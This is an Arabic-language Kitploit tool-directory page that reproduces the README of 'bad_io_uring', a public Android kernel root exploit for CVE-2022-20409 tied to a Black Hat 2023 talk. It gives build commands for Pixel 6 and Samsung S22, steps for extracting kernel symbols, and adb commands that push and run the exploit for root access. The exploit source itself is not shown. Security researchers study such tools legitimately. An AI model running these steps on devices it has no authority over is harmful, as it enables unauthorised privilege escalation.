Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
bad_io_uring — استغلال نواة Android لـ CVE-2022-20409 | Kitploit
أدوات/GitHubGitHub/markakd/bad_io_uring
أمان أندرويدتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن الجوالاستغلال الملفات الثنائية
GitHubmarkakd/bad_io_uring

bad_io_uring

استغلال نواة Android لـ CVE-2022-20409

عرض المستودع
21330منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

سيء IO_uring

https://www.blackhat.com/us-23/briefings/schedule/index.html#bad-io_uring-a-new-era-of-rooting-for-android-32243

بناء الاستغلال

تأكد من تثبيت Android NDK. بالنسبة لـ Pixel 6،

root@kitploit:~
make pixel

بالنسبة لـ Samsung S22،

root@kitploit:~
make s22

كيفية استخدام الاستغلال

الاستغلال مكتوب لدعم إصدارات مختلفة من النواة. لنقل الاستغلال إلى نواة مختلفة، تحتاج إلى استخراج ملف الرموز للنواة المستهدفة.

يمكن استخراج النواة من صورة المصنع للهاتف. بالنسبة لأجهزة Pixel، قم بتنزيل صورة المصنع هنا.

بعد تنزيل الصورة، استخرج الصورة للحصول على ملف boot.img. يمكن استخراج boot.img باستخدام tools/unpack_bootimg.py.

root@kitploit:~
python3 tools/unpack_bootimg.py --boot_img boot.img --out out

سترى النواة في out/kernel

الآن، مع صورة النواة، يمكننا استخدام vmlinux-to-elf لاستخراج رموز النواة منها.

root@kitploit:~
./tools/vmlinux-to-elf/kallsyms-finder out/kernel > pixel.kallsyms

يجب التأكد من أن سلسلة الإصدار المستخرجة في الرمز تطابق إصدار نواة هاتفك. يمكن العثور على إصدار نواة الهاتف من خلال adb. على سبيل المثال،

root@kitploit:~
sh-3.2$ adb shell
oriole:/ $ uname -a
Linux localhost 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022 aarch64

يطابق

root@kitploit:~
[+] Version string: Linux version 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 (build-user@build-host) (Android (7284624, based on r416183b) clang version 12.0.5 (https://android.googlesource.com/toolchain/llvm-project c935d99d7cf2016289302412d708641d52d2f7ee), LLD 12.0.5 (/buildbot/src/android/llvm-toolchain/out/llvm-project/lld c935d99d7cf2016289302412d708641d52d2f7ee)) #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022

الآن يمكنك دفع الاستغلال وملف الرموز إلى الهاتف والحصول على صلاحيات الجذر باستخدام الأوامر التالية.

root@kitploit:~
make
adb push exp pixel.kallsyms /data/local/tmp
adb shell
cd /data/local/tmp
./exp pixel.kallsyms

استمتع بصلاحيات الجذر :)

تنزيل الأداة